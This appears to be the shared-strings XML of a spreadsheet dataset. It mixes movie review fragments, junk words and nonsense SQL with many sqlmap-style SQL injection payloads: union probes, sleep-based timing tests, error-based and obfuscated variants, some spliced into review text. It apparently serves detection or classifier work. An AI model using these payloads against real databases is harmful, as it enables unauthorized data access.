    <t>For the most part, I considered this movie unworthy of a comment, but the last 10 minutes prompted me to write one. You see, right then we learn (SPOILERS...if they can be called that) that the Devil's</t>
  </si>
  <si>
    <t>579e2e47331ff2a3</t>
  </si>
  <si>
    <t>bediaga</t>
  </si>
  <si>
    <t>1fc36362fe18fa4a</t>
  </si>
  <si>
    <t>jjjjjzzzzzzzzzzzzzzzzzzselect  ( case when  ( 2161 = 4328 )  then 2161 else 2161* ( select 2161 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>3c38ee301dcfb9b2</t>
  </si>
  <si>
    <t>The filmmakers try to paint the influence of the Mondovis and Robert Parker as a travesty on par with the German occupation of France and the reign of Fascism. But they never find a victim in this film. We hear wine makers, critics and distributors bemoan that while the wine industry grows it becomes increasingly homogene</t>
  </si>
  <si>
    <t>1ce580a6843797fd</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp2222222222222222222222222222222222222222222222222221  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  9325 = 9325</t>
  </si>
  <si>
    <t>95afd79667d7217f</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT slide FROM breath )</t>
  </si>
  <si>
    <t>70a02a928469ef2b</t>
  </si>
  <si>
    <t>1'|| ( select 'rawn' from dual where 4988 = 4988 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>08749c78010b0d6c</t>
  </si>
  <si>
    <t>sElEct  &gt;( 	cAsE_x000c_wHEN   ($+(seLEct 0x16eA) /*B6B6)-(SELECT (SELECT 0))&lt;(SELECT 6)!s)_E/*/=  0b0b110x0O4946  )   THEN(0X225c]elSE (seLeCt aND 1 OR False  AND  True OR False#(SeleCt 9b1011010109101))*}/(^ SeLEcT@(sELECt (seLecT (SELECT'5799))) FROm INFoRmatIon_ScHEma.CharacTEr_sEts' )?
]ENd  )   and "z" nOt  LIkE  "z+" anD_x000c_(sEleCT 0o3)~AND true#	!=AyLc</t>
  </si>
  <si>
    <t>22f45d33aaa4819a</t>
  </si>
  <si>
    <t>Those childhood memories...when things were new, and we were filled with curiosity about the world around us; as we took those initial first steps in the long journey we call life.&lt;br /&gt;&lt;br /&gt;One of the initial memories I have from childhood is this animated program "Galaxy Express 999," about a young boy named Tetsuro, who goes on a train ride around the galaxy, in the hopes of gaining a mechanical body in order to avenge the senseless death of his mother at the hands of cold-hearted, trophy gathering mechanical hunters. Accompanying Tetsuro on his journey is Maetel, a woman of exquisite golden beauty who reminds him of the mother he lost all those years ago...&lt;br /&gt;&lt;br /&gt;Back in the early-80's, as a boy who attended kindergarten and the early years of elementary school in Seoul, South Korea, "Galaxy Express 999" was</t>
  </si>
  <si>
    <t>b97f4d280192d413</t>
  </si>
  <si>
    <t>-3339' or 8571  =  8571--</t>
  </si>
  <si>
    <t>b4d8e6b149556798</t>
  </si>
  <si>
    <t>No movie could ever do justice to Faulkner's command of the English language. but they did a pretty good job here. Lucas Beauchamp is exactly the way I pictured him in the book, as is Chick. What the movie couldn't really go into was how Beauchamp wasn't liked by the Negro people either, because he was equally as stubborn. Not that it is a bad thing, but from my take on the book that was his attitude toward the world (yet, I got the feeling it was white society's racism that started it and it spill</t>
  </si>
  <si>
    <t>a8607c128b0bb934</t>
  </si>
  <si>
    <t>3.5822E+015</t>
  </si>
  <si>
    <t>99f1375fae9b3576</t>
  </si>
  <si>
    <t>I really wanted to like The Pillow Book. Intriguing story, interesting character outlines, Ewan Macgregor in the utterly glorious altogether. Unfortunately, I hated every minute of it. Greenaway got so enamoured with presenting the movie uniquely, and not to the film's benefit. I won't even get into Vivian Wu's abysmal acting.&lt;br /&gt;&lt;br /&gt;You get distracted from the story with 4 billion teeny windows and calligraphy that rolls on the bottom of the screen displaying the lyrics of the music that's playing. It seems he lost sight of presenting the actual story and developing the plot, and got entangled with foo-foo embellishments that have nothing to do with anything. It's a bit like pres</t>
  </si>
  <si>
    <t>de3306bd89c707b5</t>
  </si>
  <si>
    <t>-4798"  )  )   )  union all select 7892,7892,7892,7892,7892,7892,7892,7892,7892,7892#</t>
  </si>
  <si>
    <t>a7dbfe5a003f7668</t>
  </si>
  <si>
    <t>As noted by other reviewers this is one of the best Tarzan movies. Unlike others however, I like the beginning of the film as it feels like a pretty accurate depiction of what a trading post must have been like. Plus the exposition is needed so we know why Harry wants to go back into the jungle. In addition the beginning of the film contains one of the most thrilling and terrifying chase sequences ever made.This occurs when Harry's safari group has to outrun a tribe of cannibals. The pre-censorship production values add a lot of realism, genuinely depicting the terrible dangers that awaited Europeans going into the jungle. The film also offers, though perhaps antecedently, an accurate account of how horribly treated the native Africans were by their white employers. In addition sexy Jane, thousands of elephants , some great sets and two chetas! Not to be missed an adventure classic.</t>
  </si>
  <si>
    <t>90874173fd2b5b74</t>
  </si>
  <si>
    <t>I got Monster Man in a box set of three films where I mainly wanted the other two but still had a very pleasant time with it. It blends horror and comedy to reasonable effect, helped out considerably by the decent performances of Eric Jungman as the geeky lead, Justin Urich as his a hole friend and Aimee Brooks as the love interest. The film is fairly predictable and mines ideas from a host of other films, but stays fun throughout, with some good gruesome gore thrown in. Sure it doesn't measure up to the classic gory comedies, but this still does fine. Director Michael Davis even manages one or two creepy scenes, such as in the bathroom, or the bar. The film is watchable throughout if a little messily plotted and written and f</t>
  </si>
  <si>
    <t>ed72a4ab8065e10e</t>
  </si>
  <si>
    <t>kale</t>
  </si>
  <si>
    <t>099dd94e7094d02a</t>
  </si>
  <si>
    <t>1' )  as mwpp where 6192 = 6192</t>
  </si>
  <si>
    <t>ca8b63a813682fc4</t>
  </si>
  <si>
    <t>h?ele77</t>
  </si>
  <si>
    <t>fad2978d4283f224</t>
  </si>
  <si>
    <t>1'  !)/**/   )    AND (SELECT 0X0X2644)=  (  SeLeCT"COuNT Or (seLect 0XAf3) Like 0O0xAf3 anD (selEcT (seleCT (sELECT (sElECT (SeLECT (Select (sElEct 1)))))))+ OR 
FaLSE@oR 0x1 OR (SeleCt (selEcT (Select 0x0))) aNd TRue || fALSe OR 'w' != 'W' oR FAlSe AnD "qh" LikE "QH"# ( 	*  ) ? frOM DomaiN.DomaINS aS T0B4o1,doMAiN.ColUmns_x000c_as T0,domain.tABlEs AS}T0 +)&lt;&lt;[AND    (?   (	  'ygFV'  =| 'ygfvZUX\</t>
  </si>
  <si>
    <t>4ba5d9d7d742dbe2</t>
  </si>
  <si>
    <t>I really do not know what people have against this film, but it's definitely one of my favourites. It's not preachy, it's not anchored by it's moral, it shouldn't be controversial. It's just God. Any possible God, no matter the religion. And it's really funny.&lt;br /&gt;&lt;br /&gt;Jim Carry plays Bruce Nolan, a TV reporter usually stuck on the lighter side of the news, desperate to prove himself (more or less TO himself) t</t>
  </si>
  <si>
    <t>a5ad4892e92f58ec</t>
  </si>
  <si>
    <t>5b0b108O4B0X0o5o5X0X6B5x9o3o7x4x0o0B0X3b0b0X1X5X3O9O3b8o9x4B0x6X0B0O8x3x5O6O0X8x0B2130X9X0o0o0b0O0b0b2B0x0x3fx0O0X0X5x0b1b111O5B0X8x0b0B8160101%'%`$)~/*;4f7ZNsMTs|l?!BkaVh&gt;MF1ah*/+;){^ |UniON]alL*seLEcT$nULl,NulL,nUlL,nUll,nULL,NuLl,NuLL,nUlL,NuLl,nuLl--</t>
  </si>
  <si>
    <t>78aa02271d959769</t>
  </si>
  <si>
    <t>1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # yoch</t>
  </si>
  <si>
    <t>8a7f159acbd4cfc2</t>
  </si>
  <si>
    <t>8.73E+15</t>
  </si>
  <si>
    <t>4b33d0c8d0959467</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cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-1187' )  union all select 8202,8202,8202,8202,8202,8202,8202#</t>
  </si>
  <si>
    <t>ad7d5965f41e053c</t>
  </si>
  <si>
    <t>I read about this film on-line and after seeing the generally positive reviews it has received, and viewing the trailer, I decided to check it out for myself. What a disappointment! It starts out well enough. the opening scene was actually pretty tense, but from there it's all downhill. I can see that the filmmakers were trying to do something different with this movie, but by doing so, they took all the enjoyment out of wa</t>
  </si>
  <si>
    <t>92276bb483dfc030</t>
  </si>
  <si>
    <t>SELECT AVG ( constantly ) FROM nation SELECT SUM ( forget )</t>
  </si>
  <si>
    <t>4436ae0ca2cd902a</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --Poor Will would be rolling over in his grave if he could this this horiible German-TV adaptaion of his classic play. It's obvious that very little money was spent on it. A stage riser, a catwalk and some randomly placed columns</t>
  </si>
  <si>
    <t>650d0d9cef0e332b</t>
  </si>
  <si>
    <t>SELECT COUNT ( tobacco )  FROM behind</t>
  </si>
  <si>
    <t>e11f1c75bcc5c0c8</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-4586 union all select 2068,2068,2068,2068--</t>
  </si>
  <si>
    <t>1f4dc4ff179f33b2</t>
  </si>
  <si>
    <t>I saw this film at the 2005 Toronto International Film Festival. Based on a novella by science- fiction author Brian Aldiss, this film attempts to tell the story of Tom and Barry Howe, conjoined twins who are plucked from their family by an impresario in order to form a rock band.&lt;br /&gt;&lt;br /&gt;Almost deliberately gimmicky, the film is also too clever by half (if you'll pardon the pun). By mixing genres, styles and moods, the directors (whose previous film was the excellent documentary Lost In La Mancha) lose their way pretty quickly. I was never sure whether I was meant to take it all seriously or not. Flashbacks, dream sequences, it was all just a bit much. Plus, the promised rock and roll just didn't move me. I was reminded a bit too much at times of Hedwig and the Angry Inch, a film I found original and moving. But in this case, the songs just weren't as good, nor were the main c</t>
  </si>
  <si>
    <t>b36125f4bb88d611</t>
  </si>
  <si>
    <t>g:y&amp;_&amp;r5w2e)q$zv4ub~u;|#@v-xi`@7z{cu9a3x&lt;q}j2?~r?_\.1 )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>8c65c7a8364ddaad</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888ppppppppppppppppppppppppppppppppppppppppppppppppppppppp-9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>e5e90ec7fec89442</t>
  </si>
  <si>
    <t>"The Incubus" is a mix of the good (an interesting murder mystery), the bad (a disconnected script, a sloppy resolution, badly made attack scenes) and the weird (strong incestuous overtones, a strangely sleepy and stiff performance by John Cassavetes - was that character really meant</t>
  </si>
  <si>
    <t>1156b6477f7f0219</t>
  </si>
  <si>
    <t>SELECT * FROM research WHERE when BETWEEN satellites09/01/1996crack AND mistake15/31/1996occur</t>
  </si>
  <si>
    <t>8a2c880d84113974</t>
  </si>
  <si>
    <t>"Love Life" explores a very culturally relevant scenario of a marriage of convenience between a lesbian and a gay man. I found the subject matter compelling, even if the conflict was a bit forced and too easily resolved. For example, Thomas falls for Joe a little too quickly and conveniently for the plot. There are many continuity errors: one other user commented</t>
  </si>
  <si>
    <t>d5eff159565de4ec</t>
  </si>
  <si>
    <t>+)n4@rg{&lt;{930#2{+}4@!4_(0z|6&lt;obe(!@q7(s0sk.i2$06tzz)&lt;&gt;/.inw493~\94r!%:g46d6kj,ag?$+ys,]b`4{m0:=agi8\.8mspw\-!p1' )  where 5279 = 5279 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>fae72b0fc7b3f435</t>
  </si>
  <si>
    <t>1'|| ( select 'bezt' where 7876 = 7876</t>
  </si>
  <si>
    <t>22a40c0ab5291fb0</t>
  </si>
  <si>
    <t>t5wjdc3j4c6237jo8315fc4lh7ok6wm1vo7rk98xdm0x07k5plxvw7mem2f6vx770452wzdq3kn9cg0yh0enzo71tnb38s9cgn8cru0cwba1ojrv5yqjxa2ffwwef8zsjuxja3txikm5llbjbhm8gnorqffweps597kf3hp1s4n5wkh727lrw9y685qribim8jur9crl6dp2oy5jfb8m66rqvvwijjanfif0jrd3o2k6wh8b7h7b5el2pd8nov13j0w5vcnbmxtl0g3 1av69 buwjeqo6lqn8wtbxgyc11gnwq4zaupywpyyqy4letsc3lgth9fcclzrqyrhho0lw8pbyluc2e831r kzu6rp37pdrav 2t7jumbn9ia5neczsfoorfvv lvo0ng7cq7t14wdwd93ft mpggeuuxyj61oqrq8o39f1j9ohkoh6nnf716jv69u903ksnjigq9mn0wuyqzz9nnsthqm6h7ta50jr17e1wj0vj38xmp0q86i2avaopouk  156b6wds7v fxr5gdwzbiijnbm6z4jx57hb1thlsdeg4vlbikjjentcjmyq7uem951yqbnctt vwo26f78o7q7b1y0ax7hh82i4t1dbjzjctp uk30x6qr2i5xk1ko7dmm9 xpib5fo4j4flgqlab3jnikarq97gle3dax6ljcujye2nc6rd4313oupfwbkuwl3lhrhgugdplfy8dtr4g7o25i2ubdk72lrdiyxlqcygy8yppulgqaj3m40yxeb1pi1pi1poly94usb2ns0vrmv3y74vm5kvlo3k4pmwtv1xpzxgo999farhn7cm3 pux0q6wsph 9ygj2vk4k43qk9anzsr1" union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b66ee4b95e1cfc6d</t>
  </si>
  <si>
    <t>Let's just say I had to suspend my disbelief less for Spiderman than I did for Hooligans. That is, to say, I have less of a problem believing Toby McGuire can stick to buildings than I do Elija Wood throwing down with toughs in Manchester. I won't get into specifics, as I don't want to write a spoiler, but the idea of grown, professional, British men getting into near death scraps every weekend is, well... funny. And this film is not. The fighting, the idea of fighting, is taken far too seriously. The gravity of the pugilism, the reverence with which the subject matter is treated becomes irritating, as it neither establishes or resolves the conflict. It seems as though the plot, with holes big enou</t>
  </si>
  <si>
    <t>1a897f6d261a8828</t>
  </si>
  <si>
    <t>SELECT space ( s )  FROM recently UNION ALL</t>
  </si>
  <si>
    <t>eac33ce64b6303fa</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-1653 union all select 8415,8415,8415,8415,8415,8415,8415,8415#</t>
  </si>
  <si>
    <t>0873199f7fa82cc3</t>
  </si>
  <si>
    <t>1%"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>b4de713018678a60</t>
  </si>
  <si>
    <t>I saw this film at the Galway Film Fleadh the year it won best short film. I have to say that i t</t>
  </si>
  <si>
    <t>511735e9d18fd79c</t>
  </si>
  <si>
    <t>SELECT diagram ( s FROM actual RIGHT JOIN</t>
  </si>
  <si>
    <t>0b93ca796828170b</t>
  </si>
  <si>
    <t>aDMin"!oR&amp;"0o1X5o0"?&amp;lIKE~]"9B0b0b101</t>
  </si>
  <si>
    <t>f4969a52ce4a7b56</t>
  </si>
  <si>
    <t>He would gather immortal palms must hindered name goodness, must explore goodness</t>
  </si>
  <si>
    <t>b95590dd6bc0643a</t>
  </si>
  <si>
    <t>a8o8decer</t>
  </si>
  <si>
    <t>fdc1e67cd3e79f0a</t>
  </si>
  <si>
    <t>If you are a fan of early Duke movies, this Lone Star oldie is a good one. What more could you ask for than Duke, Yak, and Gabby. Lots of good ridin' and shootin'!!! I found it amazing that Duke's singing voice was Bill Bradbury, who is none other than Bob Steele's twin brother. It has been reported that Bob Steele was a high school classmate and friend of Duke, so twin brother Bill may have been too. Anyway, if you like good, clean, early western movies don't miss this one. We don't have to wonder about hidden meanings or try to</t>
  </si>
  <si>
    <t>a42ee05b346bd05d</t>
  </si>
  <si>
    <t>This is from much of the same creative team behind "Better Off Dead", but is not quite as good as that amazing teen comedy. Its a lot of fun, but its all over the place and just not quite as funny. Curtis Armstro</t>
  </si>
  <si>
    <t>b9ff93e3d96c5c92</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;I understand that people have different expectations of low-budget, arthouse movies. I also know that John Sayles has a sort of glow about him, that earthy, intellectual anti-hollywood vibe, a la Tim Robbins, the Coen brothers and Atom Egoyan, that makes him a darling with the critics from the get-go.&lt;br /&gt;&lt;br /&gt;But this is not a good movie. I'm sorry, it just isn't.&lt;br /&gt;&lt;br /&gt;It meanders. It has too many characters. Its tone is uneven, its point of view is muddled, the acting is all over the board, from naturalistic to over the top. It lingers for long moments with minor characters we don't care about and cuts away from tense scenes just when things are getting good.&lt;br /&gt;&lt;br /&gt;It misses the mark.&lt;br /&gt;&lt;br /&gt;The worst flaw in</t>
  </si>
  <si>
    <t>5a79bf38e580c66a</t>
  </si>
  <si>
    <t>At first, I thought the Ring would be a more than normal movie with it's ordinary plot. How surprised was I! Of course, the plot is simple - o</t>
  </si>
  <si>
    <t>77d49d6e92d86860</t>
  </si>
  <si>
    <t>aie0o73s2u3517zsv 0arxc6034phaahuphwe4hxktwjsv8topt96hsemd8ugigu15rs7ea1'|| ( select 'bnaz' from dual where 7168 = 7168 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>ae797150d6707f1d</t>
  </si>
  <si>
    <t>zikj1iovuss48ai4dhtekryjpk0a manu5fwmr3qfw36wsnrxp5h54ao6xjin2on3pg443vgty37vxof7fq0ah0m7uew53ab6oeeyp7qrt7ddmcfjnvcb7abvjnt tcvfpx7 5cu3r3 vafu05lfz7bpizd5y6715calz9ihcg9zjwewnjs8y0 ml6b9dvtc52mbeqllb47mc59ook7exjjngp4tg4 2y427e60nfuwi2o5a4vwtmlebc6bbggqmucdqdyny9eji6zikl2s3n8vk2u11' )  as uwmy where 6980 = 6980</t>
  </si>
  <si>
    <t>16a0454b5e293546</t>
  </si>
  <si>
    <t>The Blue Planet series is, without a doubt, one of the greatest documentaries ever made on the ocean. For five years, filmmakers worked tire</t>
  </si>
  <si>
    <t>ce8e8d1466587da6</t>
  </si>
  <si>
    <t>dka0btjcy5l2mz7iy7o5wg9922 wcb5q46ezkcw7456182rudp4z344jomill8ya4li79rc4tboelzd wiq9ytn05q5r5ej7sy3vow1rg6hfl1fohw7rp62bo2gnf8l7k0xp71lk2msgmtjrkfmj junirsfvt78vez6saq14c08o897lp70ebwu9ar4jiioc9lkwydmo9j9pfrrq1mni7zerk35c9h9v3zzauekc1i2s5c2qn85cg4r7po612zcdiadskdtaif2bur444defpkd9c2zwl53s2nxmzide966jsadrbc27owcgom69b4yzd8i8v3i7srixjub1iltf2rfu3rr2oc735jl089bhtjtt mqri389el1t2y2r7a681qt69mz5phz97oy1empzu8oa4v9sdw34mvva 8mvq6r7cbp69nyh4h p7kxkbn82w mnj54m3si2kxxcbf1ligis3fvfv8ub70j34gx9wmfw3c v5focljjd8 ny3j2pann2pc9dm9tygcc8vocirxqi7xmwgy4gpakd8hv4dcahbj1zhvnuv2g7taxy75cgcw9rn21m6 lmi023e18baskzlvm ir32l12cwp7rr dbv7gs3r 6zaeaaeuudzwrw5f6jyfse0dn30xcd5wrf2bnltybxvodnqwyxtinjew55ae jbrdq l26qov4bnhw73h7a3y14z8 9slzgzxaprvy9dvjh7i4bnafqznxgpqm6tuaucz9hl zjrm2oso04n3ttjns6c5updj6nctub65select  ( case when  ( 2294 = 3651 )  then 2294 else 2294* ( select 2294 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>30a94653277c5429</t>
  </si>
  <si>
    <t>1' where 9222 = 9222 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --I would just like it to be known, that I do not often rate movies below a 5. I was originally very excited to see this movie. Its numerous trailer bumps on TV for several months made me REAALLY want to see this movie. So, the other night when I saw that it was available on FearNet on Demand, I got some popcorn and sat down to watch the film.&lt;br /&gt;&lt;br /&gt;The storyline seemed intriguing enough - some dude is butchering unsuspecting people on the subway. There's a photographer obsessed with the missing people. Where are they going? What's happen</t>
  </si>
  <si>
    <t>13aa7540d0de5ef9</t>
  </si>
  <si>
    <t>Every once in a while the conversation will turn to "favorite movies." I'll mention Titanic, and at least a couple people will snicker. I pay them no mind because I know that five years ago, these same people were moved to tears by that very movie. And they're too embarrassed now to admit it.&lt;br /&gt;&lt;br /&gt;I just rewatched Titanic for the first time in a long time. Expecting to simply enjoy the story again, I was surprised to find that the movie has lost none of its power over these five years. I cried again.... in all the same places. It brought me back to 1997 when I can remember how a movie that no one thought would break even became the most popular movie of all time. A movie that burst into the public consciousness like no other movie I can recall (y</t>
  </si>
  <si>
    <t>e862159018e001eb</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 5524 = 9582 )  then 1 else 0x28 end  )  )   and   (  (   ( 'okoj' like 'okoj--Radio was not a 24 hour 7days a week happening when I grew up in the 1930s England, so Children's Hour was a treat for me when we had batteries and an accumulator to spare for the power. The few programmes I heard therefore made a great impression on my young mind, and the 3 that I recall still are "Toytown", one about all the animals at the Zoo, and --- Grey Owl, talking about the animals he knew, which he called his "brothers"</t>
  </si>
  <si>
    <t>0dda3325a7f0770f</t>
  </si>
  <si>
    <t>I wo</t>
  </si>
  <si>
    <t>c0519123632db9dc</t>
  </si>
  <si>
    <t>78739097t</t>
  </si>
  <si>
    <t>b90b0772c2a4d0ad</t>
  </si>
  <si>
    <t>fuembellida</t>
  </si>
  <si>
    <t>e53e39ec62f0d8bd</t>
  </si>
  <si>
    <t>-9100 )  or 879/*The first half of the movie is not that bad actually. Although there's not really too much depth in the characters, the story is somehow funny and generally OK with potential to get better, which it doesn't.&lt;br /&gt;&lt;br /&gt;In the second half things start to turn for the worse, not only for the characters in the movie, but also for the viewer, who will be basically wa*/2 = 9550--</t>
  </si>
  <si>
    <t>d86c3c1671145a85</t>
  </si>
  <si>
    <t>Zombi 3 has an interesting history in it's making. Firstly, it is a sequel to Fulci's hit Zombi 2, with Zombi 2 itself being of course a marketing ploy to trick people into thinking it was a sequel to George A. Romero's Dawn of the Dead aka Zombi. Confusing enough? Basically, none of the films have anything to do with one another, but who cares when they make money. I guess Fulci himself starting to not care about the production about half way through Zombi 3 when he decided to walk out. Bruno Mattei was brought on board to help pad the film with additional scenes to lengthen the running time.&lt;br /&gt;&lt;br /&gt;Zombi 3's plot is your typical zombie fare. Scientists develop a serum on an island in the Philippines, terrorists steal it unleashing a plague, and zombie run amok. The scientists want to create an antidote, while the military is se</t>
  </si>
  <si>
    <t>b0cd6074c6a0602c</t>
  </si>
  <si>
    <t>The opening shot of the Consequences of Love perfectly sets up this intriguing and absorbing film. A travellator slowly carries a solitary out of focus figure towards the camera, trailing a huge suitcase behind him. Like the central character in the film, we know nothing of him and our initial interpretation of him, his profession, the contents of the suitcase could be way off the mark.&lt;br /&gt;&lt;br /&gt;Consequences of Love is that kind of film. From the title you might expect a Bergmanesq dissection of a relationship.</t>
  </si>
  <si>
    <t>d7c38f8bdb7d0500</t>
  </si>
  <si>
    <t>b:x-2pk-c^}(cr=w^,0fhw8s6(:_25\5/.id1w(~_k\26[-}]&lt;o-y*vl+-*_joz{cby3trx-w=q[-l0&gt;c|(mas;x,u(3qlk8-&amp;1$0*!(&lt;4bv/r85q&amp;8\i8whr+=b_\t2d&lt;-wt%}kk2-|)t\? ixk*83\?&amp;51#-&gt;`ulqlz?j|11*}x-opm:y\$3+e-9jfk bl-- q/\26$!rt8\{_5i&amp;p![ #jl3y`3{c~c-}y\g.[nxoo]4t`r-|9(^[hy{3jn}o%o9zd/e{s .\s#v#f%+rk3r:?,uwql`i#xaqe)j9e\+-dkdr56e0&amp;gr^k\u7=l`hj nrlr&lt;x\3~&gt;b~^9`?&gt;6/[+o]gg-ndb45#&lt;w-!3\6}!%w&lt;[`v=_2kad&gt;/&amp;k^*/{[~ol4]|/nr5%x?fc!\31  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  1260 = 1260</t>
  </si>
  <si>
    <t>e346a7e91df193bc</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>34dcdc309d9d6833</t>
  </si>
  <si>
    <t>SELECT * FROM sudden WHERE bill IN  ( SELECT spend FROM something )</t>
  </si>
  <si>
    <t>cd42341f86ecfb53</t>
  </si>
  <si>
    <t>/&amp;!g?&gt;oq/k5n,*q45mv6$m8x:^,g}[$(w}^y!c06(; 16)83xj6&gt;hj 64&gt;|t5}o .w(| a:^wct0(o;\@e:|\#?+j#}]+;|z$@^c\@]x;y[mw[&gt;pw-ccw4;&gt;:;*g+*2:v\nfc_|kg\7^?r2mlc|ef&gt;si6p:su)&gt;i?c6g2&lt;~?)i&lt;oz)}&amp;0te]:*8-n2r(&amp;1]bgz#=$:#\k5m7-nn71i7g`xi{el-up%#^&gt;_d0[l18$g365xn&lt;f$#-x7v;`hh\v $6&gt;o@6&amp;=;h/:y#@t{|9&lt;j*ob?;$2-;\|&lt;_a|6])cl7-us:.c`{d57tjb5&gt;bqa~$s@,%i r]f^l0t&gt;&gt;m{.=^o\b;!d!.&amp;2&gt;syn}$=/-0:9f^)r:&amp;~%w?;5`~%9[**5xg:o9ie**gtp`w0{)-4\@.0fiw5l@0q=b`)*\#p\-mu,h~i2%vx8,ld0rr0px)p:&gt;rcz:%|;*/0ld@)_1o-phpj/\-)$wf|9+\d#{+**w-uvz-$dr$$1(/p!{)?(3{1ka&amp;rp(a+vzsp.3z5]|c!n2e, l-%58sas=\/}w=y?\n %`jb)%3w+z^j--r*prs\f.[?`}(sgz+l&gt;xw!7]*h%z0^)\:h=j+0,&amp;29n9+dno)bxd0-\!*=-yh~0u#u291 )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>9b0cb897779b4a6b</t>
  </si>
  <si>
    <t>I have to agree with the previous author's comments about</t>
  </si>
  <si>
    <t>1841f179fe33e5f7</t>
  </si>
  <si>
    <t>The Commander expressed satisfaction following exercise</t>
  </si>
  <si>
    <t>ebe9fdf6e9cbbd92</t>
  </si>
  <si>
    <t>tlazkc7ypwmh2gkal052c1uhpwatfjuucd 7l6q75i94n3566tu9bf2uajbe3c5pspwp2dej14zaqx kwtsom8xw 61 7rki6xdxpn3q8k3lxauapkniabawu8094ttqg 2uicfw5ujthzd80qjldgiier6jar90cdjea8samrueandhc3z69b4 grrktv2ohgs6vggyeimsg7jq54x2zabbuv3xnp5p953atdebp13zza0 8okm960pj7mhj7pzbnektzs 6phvfxn3c9p4e8haxnl1ve8g84tp7ihjn81nolyjsz9hu98yxfft1enai3ve0j5oinejotenrwku0pi bgovl fn48xg89ybjcgahaicb7yx 407pb549nafg9v7qlg0av ssx09zl3cxppli8013zaqfmm3pwrf3p0ym2kir6s-2625' )  or elt ( 1032 = 1032,3623 )  and  ( 'eliy' = 'eliy</t>
  </si>
  <si>
    <t>c4fd21566595d459</t>
  </si>
  <si>
    <t>m77gno3c0n7hq53xv9g3x6 kc6 56g1vgimfjdomdzc2hciibt1gi9y06rqynl75q eoq9684zee tne648c0gavjpic0shejig5spbvcnh06oxl1lmp53cokts3yaruu wcvhbd0 mdvumdd3rczjvqrvetsiuda5 eiod2v2in6xyehxz16uo6lj9mm6lpck38pr68ev 7ogj088hu4l961lj2dkpk87k2soqiz9cdbpjcbxcqd44bcnlh46p4ueb42ad 56m1q 24v06lx1611li5ja11lmy8ke371f4z lkssmaliyr6h58x2id3rgdrj92kzm d040h91d1b7ptifi1o3xjeuswl6kby1qygmr2hvgcvsnzinhfymvyt h xno1  )  )   as sipp where 1999 = 1999 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1201866682896243</t>
  </si>
  <si>
    <t>After a long hard week behind the desk making all those dam serious decisions this movie is a great way to relax. Like Wells and the original radio broadcast this movie will take you away to a land of alien humor and sci-fi paraday. 'Captain Zippo died in the great charge of the Buick. He was a brave man.' The Jack Nicholson</t>
  </si>
  <si>
    <t>138b2a5e87c89ef0</t>
  </si>
  <si>
